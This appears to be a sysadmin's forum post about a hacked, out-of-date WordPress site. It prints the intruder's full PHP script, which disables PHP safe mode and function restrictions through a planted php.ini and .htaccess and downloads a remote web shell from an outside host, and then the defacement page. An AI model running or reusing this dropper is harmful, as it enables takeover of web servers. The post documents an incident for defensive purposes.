Came across this in the wild today. Someone exploited an out of date WordPress installation on a VM we were hosting for a customer. Due to the sloppiness of escalation attempts it looks like the work of a true script kiddie.
the root web directory was left a total mess. Although the defacement was successful (which was just replacing the index.php file) none of the other attempts succeeded and the attacker failed to break out of the VM or leverage any authority on the system. Compressed the bad files and replaced the website and sql database with the backups, changed the ftp and sql passwords and *ta da* fixed.
The attempted php foo.
<?
/*
* Title : Bypass Server [ Sfa7 Trick ]
* Coder : Dr.KroOoZ
* Home : sec4ever.com
* Greets To : b0x
* Must Upload Like Here : /home/user/www/ | http://localhost.com/bypass.php
* Password Shell is : b374k
*/
# Mkdir
$dir = "mkdir";
$bb = $dir('ARGENTINA');
if($bb){
echo "[ARGENTINA] => Folder Create Complate !";
} else {
echo "[ARGENTINA] Error !";
}
# php.ini
$ARGENTINA = fopen('ARGENTINA/php.ini', 'w');
$sec = "safe_mode = OFF
disable_funtions = NONE";
fwrite($ARGENTINA ,$sec);
fclose($ARGENTINA);
if($ARGENTINA){
echo "<br>[php.ini] => Create Complate !";
} else {
echo "<br>[php.ini] Error !";
}
# .htaccess
$create = fopen("ARGENTINA/.htaccess", 'w');
$s3c = "suPHP_ConfigPath /home/".get_current_user()."/public_html/ARGENTINA/php.ini";
fwrite($create ,$s3c);
fclose($create);
if($create) {
echo "<br>[.htaccess] => Create Complate !";
} else {
echo "<br>[.htaccess] Error !";
}
# Shell
$b37 = 'http://site.com/';
$sh = file_get_contents($b37);
$open = fopen('ARGENTINA/krz.php', 'w');
fwrite($open,$sh);
fclose($open);
if($open) {
echo "<br>[ARGENTINA.php] => Shell Upload Complate !";
} else {
echo "<br>[ARGENTINA.php] => Error !";
}
?>%
The defacement
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="Shortcut Icon" href="http://i.hizliresim.com/eoLDm9.png" type="image/x-icon">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>HACKED BY AYYILDIZ TEAM INTERNATIONAL FORCE</title>
<style type="text/css">
body {
background-color: #000000;
background-image: url(http://i.hizliresim.com/jzPL2W.jpg);
background-size:100%; margin:0px;padding:0px;
min-width:650px;
background-clip:box;
background-origin:padding-box;
background-repeat:no-repeat;
background-position:center;
background-attachment:fixed;}
.style14 {color: #FFFFFF; font-weight: bold; }
.style37 {
color: #F0F0F0;
font-weight: bold;
font-size: 10px;
}
.style38 {color: #9B0E0A}
.style40 {color: #600A0C; font-weight: bold; }
.style42 {
color: #333333;
font-weight: bold;
font-size: 14px;
}
.style43 {color: #D9120D}
</style>
</head>
<object type="application/x-shockwave-flash" width="17" height="17"data="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/1425721404516369.mp3&autoplay=true"><param name="movie"value="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/1425721404516369.mp3&song_title=uploadmusic.org&autoplay=true" /></object>
</body>
</html>
